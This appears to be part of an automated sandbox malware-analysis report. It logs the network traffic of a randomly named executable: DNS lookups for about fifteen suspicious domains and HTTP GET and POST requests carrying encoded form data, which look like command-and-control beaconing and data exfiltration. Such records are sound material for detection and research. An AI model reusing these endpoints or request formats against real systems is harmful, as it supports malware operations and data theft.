              Sep 6, 2024 09:07:54.062067032 CEST4977080192.168.2.65.144.130.52
              Sep 6, 2024 09:07:56.600569963 CEST80497715.144.130.52192.168.2.6
              Sep 6, 2024 09:07:56.601450920 CEST4977180192.168.2.65.144.130.52
              Sep 6, 2024 09:07:59.151722908 CEST80497725.144.130.52192.168.2.6
              Sep 6, 2024 09:07:59.152502060 CEST4977280192.168.2.65.144.130.52
              Sep 6, 2024 09:08:01.970495939 CEST80497735.144.130.52192.168.2.6
              Sep 6, 2024 09:08:01.970628977 CEST80497735.144.130.52192.168.2.6
              Sep 6, 2024 09:08:01.970753908 CEST4977380192.168.2.65.144.130.52
              Sep 6, 2024 09:08:01.973819971 CEST4977380192.168.2.65.144.130.52
              Sep 6, 2024 09:08:01.978605032 CEST80497735.144.130.52192.168.2.6
              Sep 6, 2024 09:08:07.027517080 CEST4977480192.168.2.6162.241.226.190
              Sep 6, 2024 09:08:07.032499075 CEST8049774162.241.226.190192.168.2.6
              Sep 6, 2024 09:08:07.035551071 CEST4977480192.168.2.6162.241.226.190
              Sep 6, 2024 09:08:07.047419071 CEST4977480192.168.2.6162.241.226.190
              Sep 6, 2024 09:08:07.052277088 CEST8049774162.241.226.190192.168.2.6
              Sep 6, 2024 09:08:07.624213934 CEST8049774162.241.226.190192.168.2.6
              Sep 6, 2024 09:08:07.624473095 CEST8049774162.241.226.190192.168.2.6
              Sep 6, 2024 09:08:07.624536037 CEST4977480192.168.2.6162.241.226.190
              Sep 6, 2024 09:08:08.551021099 CEST4977480192.168.2.6162.241.226.190
              Sep 6, 2024 09:08:09.572468042 CEST4977580192.168.2.6162.241.226.190
              Sep 6, 2024 09:08:09.577421904 CEST8049775162.241.226.190192.168.2.6
              Sep 6, 2024 09:08:09.577510118 CEST4977580192.168.2.6162.241.226.190
              Sep 6, 2024 09:08:09.599709034 CEST4977580192.168.2.6162.241.226.190
              Sep 6, 2024 09:08:09.604546070 CEST8049775162.241.226.190192.168.2.6
              Sep 6, 2024 09:08:10.174850941 CEST8049775162.241.226.190192.168.2.6
              Sep 6, 2024 09:08:10.175009012 CEST8049775162.241.226.190192.168.2.6
              Sep 6, 2024 09:08:10.175076962 CEST4977580192.168.2.6162.241.226.190
              Sep 6, 2024 09:08:11.113446951 CEST4977580192.168.2.6162.241.226.190
              Sep 6, 2024 09:08:12.133287907 CEST4977680192.168.2.6162.241.226.190
              Sep 6, 2024 09:08:12.138295889 CEST8049776162.241.226.190192.168.2.6
              Sep 6, 2024 09:08:12.138381958 CEST4977680192.168.2.6162.241.226.190
              Sep 6, 2024 09:08:12.153824091 CEST4977680192.168.2.6162.241.226.190
              Sep 6, 2024 09:08:12.158588886 CEST8049776162.241.226.190192.168.2.6
              Sep 6, 2024 09:08:12.158720016 CEST8049776162.241.226.190192.168.2.6
              Sep 6, 2024 09:08:12.768970966 CEST8049776162.241.226.190192.168.2.6
              Sep 6, 2024 09:08:12.769098043 CEST8049776162.241.226.190192.168.2.6
              Sep 6, 2024 09:08:12.769226074 CEST4977680192.168.2.6162.241.226.190
              Sep 6, 2024 09:08:13.660643101 CEST4977680192.168.2.6162.241.226.190
              Sep 6, 2024 09:08:14.679516077 CEST4977780192.168.2.6162.241.226.190
              Sep 6, 2024 09:08:14.684452057 CEST8049777162.241.226.190192.168.2.6
              Sep 6, 2024 09:08:14.687767982 CEST4977780192.168.2.6162.241.226.190
              Sep 6, 2024 09:08:14.695676088 CEST4977780192.168.2.6162.241.226.190
              Sep 6, 2024 09:08:14.700556993 CEST8049777162.241.226.190192.168.2.6
              Sep 6, 2024 09:08:15.289027929 CEST8049777162.241.226.190192.168.2.6
              Sep 6, 2024 09:08:15.289381027 CEST8049777162.241.226.190192.168.2.6
              Sep 6, 2024 09:08:15.289436102 CEST4977780192.168.2.6162.241.226.190
              Sep 6, 2024 09:08:15.292383909 CEST4977780192.168.2.6162.241.226.190
              Sep 6, 2024 09:08:15.298861980 CEST8049777162.241.226.190192.168.2.6
              Sep 6, 2024 09:08:20.351854086 CEST4977880192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:20.358792067 CEST8049778217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:20.359209061 CEST4977880192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:20.369648933 CEST4977880192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:20.374489069 CEST8049778217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:21.131532907 CEST8049778217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:21.131553888 CEST8049778217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:21.131584883 CEST8049778217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:21.131596088 CEST8049778217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:21.131608009 CEST8049778217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:21.131619930 CEST8049778217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:21.131653070 CEST4977880192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:21.131699085 CEST8049778217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:21.131711006 CEST8049778217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:21.131721973 CEST8049778217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:21.131726027 CEST4977880192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:21.131794930 CEST8049778217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:21.131800890 CEST4977880192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:21.131897926 CEST4977880192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:21.879162073 CEST4977880192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:22.899413109 CEST4977980192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:22.904344082 CEST8049779217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:22.911401033 CEST4977980192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:22.919388056 CEST4977980192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:22.924297094 CEST8049779217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:23.701781034 CEST8049779217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:23.701802969 CEST8049779217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:23.701814890 CEST8049779217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:23.701828957 CEST8049779217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:23.701839924 CEST8049779217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:23.701868057 CEST4977980192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:23.701870918 CEST8049779217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:23.701881886 CEST8049779217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:23.701893091 CEST8049779217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:23.701903105 CEST8049779217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:23.701913118 CEST8049779217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:23.701915026 CEST4977980192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:23.701940060 CEST4977980192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:23.701960087 CEST4977980192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:23.701978922 CEST8049779217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:23.702018976 CEST4977980192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:24.426279068 CEST4977980192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:25.447053909 CEST4978080192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:25.534095049 CEST8049780217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:25.534197092 CEST4978080192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:25.548528910 CEST4978080192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:25.553359985 CEST8049780217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:25.553473949 CEST8049780217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:26.330564022 CEST8049780217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:26.330594063 CEST8049780217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:26.330606937 CEST8049780217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:26.330622911 CEST8049780217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:26.330636978 CEST8049780217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:26.330651045 CEST8049780217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:26.330692053 CEST4978080192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:26.330739021 CEST8049780217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:26.330749989 CEST8049780217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:26.330756903 CEST4978080192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:26.330761909 CEST8049780217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:26.330832005 CEST8049780217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:26.330852985 CEST4978080192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:26.333534002 CEST4978080192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:27.052042007 CEST4978080192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:29.367440939 CEST4978280192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:29.372450113 CEST8049782217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:29.379482985 CEST4978280192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:29.383398056 CEST4978280192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:29.388382912 CEST8049782217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:30.163009882 CEST8049782217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:30.164520979 CEST8049782217.160.0.193192.168.2.6
              Sep 6, 2024 09:08:30.166098118 CEST4978280192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:30.166098118 CEST4978280192.168.2.6217.160.0.193
              Sep 6, 2024 09:08:30.173825979 CEST8049782217.160.0.193192.168.2.6

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Sep 6, 2024 09:04:57.576793909 CEST5429153192.168.2.61.1.1.1
              Sep 6, 2024 09:04:57.600860119 CEST53542911.1.1.1192.168.2.6
              Sep 6, 2024 09:05:13.117464066 CEST6020853192.168.2.61.1.1.1
              Sep 6, 2024 09:05:13.217022896 CEST53602081.1.1.1192.168.2.6
              Sep 6, 2024 09:05:26.570178986 CEST5111853192.168.2.61.1.1.1
              Sep 6, 2024 09:05:27.104013920 CEST53511181.1.1.1192.168.2.6
              Sep 6, 2024 09:05:40.336082935 CEST6471353192.168.2.61.1.1.1
              Sep 6, 2024 09:05:41.013298035 CEST53647131.1.1.1192.168.2.6
              Sep 6, 2024 09:05:59.300692081 CEST6303153192.168.2.61.1.1.1
              Sep 6, 2024 09:05:59.730976105 CEST53630311.1.1.1192.168.2.6
              Sep 6, 2024 09:06:13.307261944 CEST4975353192.168.2.61.1.1.1
              Sep 6, 2024 09:06:13.341367006 CEST53497531.1.1.1192.168.2.6
              Sep 6, 2024 09:06:21.403269053 CEST5773153192.168.2.61.1.1.1
              Sep 6, 2024 09:06:21.487642050 CEST53577311.1.1.1192.168.2.6
              Sep 6, 2024 09:06:34.851771116 CEST5634953192.168.2.61.1.1.1
              Sep 6, 2024 09:06:34.907738924 CEST53563491.1.1.1192.168.2.6
              Sep 6, 2024 09:06:48.257519960 CEST6111753192.168.2.61.1.1.1
              Sep 6, 2024 09:06:48.543200016 CEST53611171.1.1.1192.168.2.6
              Sep 6, 2024 09:07:02.024760962 CEST5985853192.168.2.61.1.1.1
              Sep 6, 2024 09:07:02.738656998 CEST53598581.1.1.1192.168.2.6
              Sep 6, 2024 09:07:16.601383924 CEST5102553192.168.2.61.1.1.1
              Sep 6, 2024 09:07:16.925210953 CEST53510251.1.1.1192.168.2.6
              Sep 6, 2024 09:07:30.321420908 CEST5462953192.168.2.61.1.1.1
              Sep 6, 2024 09:07:30.340076923 CEST53546291.1.1.1192.168.2.6
              Sep 6, 2024 09:07:44.414532900 CEST5416053192.168.2.61.1.1.1
              Sep 6, 2024 09:07:44.497714043 CEST53541601.1.1.1192.168.2.6
              Sep 6, 2024 09:08:06.995609999 CEST5183953192.168.2.61.1.1.1
              Sep 6, 2024 09:08:07.023472071 CEST53518391.1.1.1192.168.2.6
              Sep 6, 2024 09:08:20.306886911 CEST5310953192.168.2.61.1.1.1
              Sep 6, 2024 09:08:20.346628904 CEST53531091.1.1.1192.168.2.6

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Sep 6, 2024 09:04:57.576793909 CEST192.168.2.61.1.1.10xf7f4Standard query (0)www.omexai.infoA (IP address)IN (0x0001)false
              Sep 6, 2024 09:05:13.117464066 CEST192.168.2.61.1.1.10x8e4Standard query (0)www.030003678.xyzA (IP address)IN (0x0001)false
              Sep 6, 2024 09:05:26.570178986 CEST192.168.2.61.1.1.10x6258Standard query (0)www.sorriragora.onlineA (IP address)IN (0x0001)false
              Sep 6, 2024 09:05:40.336082935 CEST192.168.2.61.1.1.10x2da2Standard query (0)www.homebizsuccess.blogA (IP address)IN (0x0001)false
              Sep 6, 2024 09:05:59.300692081 CEST192.168.2.61.1.1.10x395fStandard query (0)www.hm62t.topA (IP address)IN (0x0001)false
              Sep 6, 2024 09:06:13.307261944 CEST192.168.2.61.1.1.10x3ad7Standard query (0)www.318st.comA (IP address)IN (0x0001)false
              Sep 6, 2024 09:06:21.403269053 CEST192.168.2.61.1.1.10xb4a8Standard query (0)www.030002721.xyzA (IP address)IN (0x0001)false
              Sep 6, 2024 09:06:34.851771116 CEST192.168.2.61.1.1.10xd2fcStandard query (0)www.lumixy.onlineA (IP address)IN (0x0001)false
              Sep 6, 2024 09:06:48.257519960 CEST192.168.2.61.1.1.10x6060Standard query (0)www.kalomor.topA (IP address)IN (0x0001)false
              Sep 6, 2024 09:07:02.024760962 CEST192.168.2.61.1.1.10x6ec9Standard query (0)www.henrry.topA (IP address)IN (0x0001)false
              Sep 6, 2024 09:07:16.601383924 CEST192.168.2.61.1.1.10x3a90Standard query (0)www.1win-moldovia.funA (IP address)IN (0x0001)false
              Sep 6, 2024 09:07:30.321420908 CEST192.168.2.61.1.1.10xac97Standard query (0)www.thewhitediamond.orgA (IP address)IN (0x0001)false
              Sep 6, 2024 09:07:44.414532900 CEST192.168.2.61.1.1.10x59b0Standard query (0)www.aflaksokna.comA (IP address)IN (0x0001)false
              Sep 6, 2024 09:08:06.995609999 CEST192.168.2.61.1.1.10x1753Standard query (0)www.easyanalytics.siteA (IP address)IN (0x0001)false
              Sep 6, 2024 09:08:20.306886911 CEST192.168.2.61.1.1.10x9831Standard query (0)www.moveon.catA (IP address)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Sep 6, 2024 09:04:57.600860119 CEST1.1.1.1192.168.2.60xf7f4No error (0)www.omexai.infoomexai.infoCNAME (Canonical name)IN (0x0001)false
              Sep 6, 2024 09:04:57.600860119 CEST1.1.1.1192.168.2.60xf7f4No error (0)omexai.info3.33.130.190A (IP address)IN (0x0001)false
              Sep 6, 2024 09:04:57.600860119 CEST1.1.1.1192.168.2.60xf7f4No error (0)omexai.info15.197.148.33A (IP address)IN (0x0001)false
              Sep 6, 2024 09:05:13.217022896 CEST1.1.1.1192.168.2.60x8e4No error (0)www.030003678.xyz030003678.xyzCNAME (Canonical name)IN (0x0001)false
              Sep 6, 2024 09:05:13.217022896 CEST1.1.1.1192.168.2.60x8e4No error (0)030003678.xyz65.21.196.90A (IP address)IN (0x0001)false
              Sep 6, 2024 09:05:27.104013920 CEST1.1.1.1192.168.2.60x6258No error (0)www.sorriragora.onlinesorriragora.onlineCNAME (Canonical name)IN (0x0001)false
              Sep 6, 2024 09:05:27.104013920 CEST1.1.1.1192.168.2.60x6258No error (0)sorriragora.online162.240.81.18A (IP address)IN (0x0001)false
              Sep 6, 2024 09:05:41.013298035 CEST1.1.1.1192.168.2.60x2da2No error (0)www.homebizsuccess.bloghomebizsuccess.blogCNAME (Canonical name)IN (0x0001)false
              Sep 6, 2024 09:05:41.013298035 CEST1.1.1.1192.168.2.60x2da2No error (0)homebizsuccess.blog192.185.16.209A (IP address)IN (0x0001)false
              Sep 6, 2024 09:05:59.730976105 CEST1.1.1.1192.168.2.60x395fNo error (0)www.hm62t.tophm62t.topCNAME (Canonical name)IN (0x0001)false
              Sep 6, 2024 09:05:59.730976105 CEST1.1.1.1192.168.2.60x395fNo error (0)hm62t.top154.23.184.240A (IP address)IN (0x0001)false
              Sep 6, 2024 09:06:13.341367006 CEST1.1.1.1192.168.2.60x3ad7Name error (3)www.318st.comnonenoneA (IP address)IN (0x0001)false
              Sep 6, 2024 09:06:21.487642050 CEST1.1.1.1192.168.2.60xb4a8No error (0)www.030002721.xyz030002721.xyzCNAME (Canonical name)IN (0x0001)false
              Sep 6, 2024 09:06:21.487642050 CEST1.1.1.1192.168.2.60xb4a8No error (0)030002721.xyz65.21.196.90A (IP address)IN (0x0001)false
              Sep 6, 2024 09:06:34.907738924 CEST1.1.1.1192.168.2.60xd2fcNo error (0)www.lumixy.online184.94.212.115A (IP address)IN (0x0001)false
              Sep 6, 2024 09:06:48.543200016 CEST1.1.1.1192.168.2.60x6060No error (0)www.kalomor.topkalomor.topCNAME (Canonical name)IN (0x0001)false
              Sep 6, 2024 09:06:48.543200016 CEST1.1.1.1192.168.2.60x6060No error (0)kalomor.top91.215.85.23A (IP address)IN (0x0001)false
              Sep 6, 2024 09:07:02.738656998 CEST1.1.1.1192.168.2.60x6ec9No error (0)www.henrry.top121.199.37.19A (IP address)IN (0x0001)false
              Sep 6, 2024 09:07:16.925210953 CEST1.1.1.1192.168.2.60x3a90No error (0)www.1win-moldovia.fun188.114.96.3A (IP address)IN (0x0001)false
              Sep 6, 2024 09:07:16.925210953 CEST1.1.1.1192.168.2.60x3a90No error (0)www.1win-moldovia.fun188.114.97.3A (IP address)IN (0x0001)false
              Sep 6, 2024 09:07:30.340076923 CEST1.1.1.1192.168.2.60xac97No error (0)www.thewhitediamond.orgthewhitediamond.orgCNAME (Canonical name)IN (0x0001)false
              Sep 6, 2024 09:07:30.340076923 CEST1.1.1.1192.168.2.60xac97No error (0)thewhitediamond.org3.33.130.190A (IP address)IN (0x0001)false
              Sep 6, 2024 09:07:30.340076923 CEST1.1.1.1192.168.2.60xac97No error (0)thewhitediamond.org15.197.148.33A (IP address)IN (0x0001)false
              Sep 6, 2024 09:07:44.497714043 CEST1.1.1.1192.168.2.60x59b0No error (0)www.aflaksokna.comaflaksokna.comCNAME (Canonical name)IN (0x0001)false
              Sep 6, 2024 09:07:44.497714043 CEST1.1.1.1192.168.2.60x59b0No error (0)aflaksokna.com5.144.130.52A (IP address)IN (0x0001)false
              Sep 6, 2024 09:08:07.023472071 CEST1.1.1.1192.168.2.60x1753No error (0)www.easyanalytics.siteeasyanalytics.siteCNAME (Canonical name)IN (0x0001)false
              Sep 6, 2024 09:08:07.023472071 CEST1.1.1.1192.168.2.60x1753No error (0)easyanalytics.site162.241.226.190A (IP address)IN (0x0001)false
              Sep 6, 2024 09:08:20.346628904 CEST1.1.1.1192.168.2.60x9831No error (0)www.moveon.cat217.160.0.193A (IP address)IN (0x0001)false

              HTTP Request Dependency Graph

              • www.omexai.info
              • www.030003678.xyz
              • www.sorriragora.online
              • www.homebizsuccess.blog
              • www.hm62t.top
              • www.030002721.xyz
              • www.lumixy.online
              • www.kalomor.top
              • www.henrry.top
              • www.1win-moldovia.fun
              • www.thewhitediamond.org
              • www.aflaksokna.com
              • www.easyanalytics.site
              • www.moveon.cat

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.6497233.33.130.190805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:04:57.620086908 CEST529OUTGET /v7i9/?FR=gVd2Q54c4wAw8FSZkJGisnGWxrnrZZv7nPVFwBxZuIdr/R+LakyKOxGnexM5cwgplfvhbdxFrnk6Pq1kbTlH0ZjmVJXvVLu8DIcVEX5jt3TfiQ8a19HD/2BSGQQXtF0fkmM7X0U=&yXghy=KTox HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.omexai.info
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:04:58.073688030 CEST405INHTTP/1.1 200 OK
              Server: openresty
              Date: Fri, 06 Sep 2024 07:04:58 GMT
              Content-Type: text/html
              Content-Length: 265
              Connection: close
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 52 3d 67 56 64 32 51 35 34 63 34 77 41 77 38 46 53 5a 6b 4a 47 69 73 6e 47 57 78 72 6e 72 5a 5a 76 37 6e 50 56 46 77 42 78 5a 75 49 64 72 2f 52 2b 4c 61 6b 79 4b 4f 78 47 6e 65 78 4d 35 63 77 67 70 6c 66 76 68 62 64 78 46 72 6e 6b 36 50 71 31 6b 62 54 6c 48 30 5a 6a 6d 56 4a 58 76 56 4c 75 38 44 49 63 56 45 58 35 6a 74 33 54 66 69 51 38 61 31 39 48 44 2f 32 42 53 47 51 51 58 74 46 30 66 6b 6d 4d 37 58 30 55 3d 26 79 58 67 68 79 3d 4b 54 6f 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FR=gVd2Q54c4wAw8FSZkJGisnGWxrnrZZv7nPVFwBxZuIdr/R+LakyKOxGnexM5cwgplfvhbdxFrnk6Pq1kbTlH0ZjmVJXvVLu8DIcVEX5jt3TfiQ8a19HD/2BSGQQXtF0fkmM7X0U=&yXghy=KTox"}</script></head></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.64972565.21.196.90805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:05:13.238421917 CEST794OUTPOST /wft4/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.030003678.xyz
              Content-Length: 207
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.030003678.xyz
              Referer: http://www.030003678.xyz/wft4/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 56 52 4d 71 7a 2f 55 79 71 58 52 45 30 72 31 35 72 53 56 52 50 49 6c 68 77 49 50 51 6f 6b 54 56 72 78 74 65 33 74 66 62 4c 36 61 33 6d 34 4f 2f 4b 50 68 56 42 43 78 55 4c 73 78 31 65 46 31 50 49 58 6e 35 4e 61 77 41 78 64 37 63 6c 72 6e 46 4c 34 72 44 70 4c 51 4d 76 36 59 7a 4c 4f 33 72 66 79 6c 48 74 41 35 58 2b 72 51 4a 4a 45 61 6a 42 67 56 35 53 66 7a 43 7a 5a 74 48 68 58 67 53 43 38 4b 69 50 34 4a 71 2f 45 55 68 62 66 48 74 65 64 52 33 32 6b 2f 4e 6e 77 76 71 5a 67 32 36 6c 75 78 34 4c 54 53 5a 2b 4a 6b 68 6d 2b 78 52 77 51 49 4b 41 44 6b 36 73 4a 4d 53 70 4c 4c 66 32 78 50 73 75 4e 70 4c 2b 4d 51 64
              Data Ascii: FR=VRMqz/UyqXRE0r15rSVRPIlhwIPQokTVrxte3tfbL6a3m4O/KPhVBCxULsx1eF1PIXn5NawAxd7clrnFL4rDpLQMv6YzLO3rfylHtA5X+rQJJEajBgV5SfzCzZtHhXgSC8KiP4Jq/EUhbfHtedR32k/NnwvqZg26lux4LTSZ+Jkhm+xRwQIKADk6sJMSpLLf2xPsuNpL+MQd
              Sep 6, 2024 09:05:13.887362957 CEST1032INHTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Fri, 06 Sep 2024 07:05:13 GMT
              vary: User-Agent
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.64972765.21.196.90805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:05:15.788914919 CEST818OUTPOST /wft4/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.030003678.xyz
              Content-Length: 231
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.030003678.xyz
              Referer: http://www.030003678.xyz/wft4/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 56 52 4d 71 7a 2f 55 79 71 58 52 45 79 4c 46 35 71 78 39 52 4a 6f 6c 67 2f 6f 50 51 78 55 54 5a 72 78 70 65 33 73 62 78 4d 49 4f 33 6d 64 71 2f 4c 4f 68 56 43 43 78 55 41 4d 78 77 61 46 31 55 49 58 72 78 4e 62 4d 41 78 64 76 63 6c 75 62 46 4c 50 58 41 76 4c 51 4f 6b 61 59 31 45 75 33 72 66 79 6c 48 74 45 70 70 2b 72 59 4a 4a 33 43 6a 41 45 35 2b 62 2f 7a 42 30 5a 74 48 6c 58 68 62 43 38 4b 36 50 36 39 41 2f 43 51 68 62 61 37 74 65 76 35 32 35 6b 2f 4c 35 77 75 48 56 31 4c 51 6c 4f 6b 34 44 77 36 2f 69 4f 70 41 75 6f 77 4c 73 6a 49 70 53 54 45 34 73 4c 55 67 70 72 4c 31 30 78 33 73 38 61 6c 73 78 34 31 2b 75 6d 37 71 6f 34 64 76 77 58 6a 75 44 67 39 66 4b 36 42 56 78 77 3d 3d
